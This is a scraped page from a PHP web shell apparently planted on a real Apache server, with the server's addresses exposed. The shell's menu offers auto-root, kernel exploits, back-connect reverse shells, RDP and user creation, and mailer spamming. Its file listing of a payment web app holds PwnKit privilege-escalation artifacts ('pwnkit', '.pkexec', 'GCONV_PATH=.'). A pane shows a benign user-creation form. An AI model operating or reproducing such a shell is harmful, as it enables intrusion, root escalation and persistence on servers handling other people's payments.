Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 13.59.58.68
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kus /
mvs /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Paytm
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
lib
[ DIR ]
drwxrwxrwx
libs
[ DIR ]
drwxrwxrwx
maya-pdf
[ DIR ]
drwxrwxrwx
plugins
[ DIR ]
drwxrwxrwx
src
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
MainPage.html
5.85
KB
-rwxrwxrwx
MainPage_31012018.html
5.58
KB
-rwxrwxrwx
app.php
416
B
-rwxrwxrwx
appForm.html
16.39
KB
-rwxrwxrwx
appStatus.html
7.48
KB
-rwxrwxrwx
appStatus_31012018.html
7.38
KB
-rwxrwxrwx
cconfig.php
1.77
KB
-rwxrwxrwx
chkResponse.php
434
B
-rwxrwxrwx
createUser.html
2.04
KB
-rwxrwxrwx
index.html
5.11
KB
-rwxrwxrwx
payment_gateway.php
7.78
KB
-rwxrwxrwx
paymentresponce.php
10.12
KB
-rwxrwxrwx
pgResponse.php
9.92
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : createUser.html
<div class="row clearfix"> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12"> <div class="card"> <div class="header"> <h2> Create User </h2> </div> <div class="body"> <form class="form-horizontal"> <div class="row clearfix"> <div class="col-lg-2 col-md-2 col-sm-4 col-xs-5 form-control-label"> <label class="pull-left" for="daterange">User Name</label> </div> <div class="col-sm-4 col-md-2"> <div class="form-group"> <div class="form-line"> <input type="text" class="form-control date" id="usrname" placeholder="User Name" > </div> </div> </div> </div> <div class="row clearfix"> <div class="col-lg-2 col-md-2 col-sm-4 col-xs-5 form-control-label"> <label class="pull-left" class="pull-left" for="RollnumberRange">Password</label> </div> <div class="col-sm-4 col-md-2"> <div class="form-group"> <div class="form-line"> <input type="password" id="password" class="form-control" placeholder="Password"/> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-lg-offset-3 col-md-offset-3 col-sm-offset-4 col-xs-offset-5"> <button type="button" class="btn btn-primary waves-effect m-l-40" onclick = "createUser()">Create</button> </div> </div> </form> </div> </div> </div> </div>
Close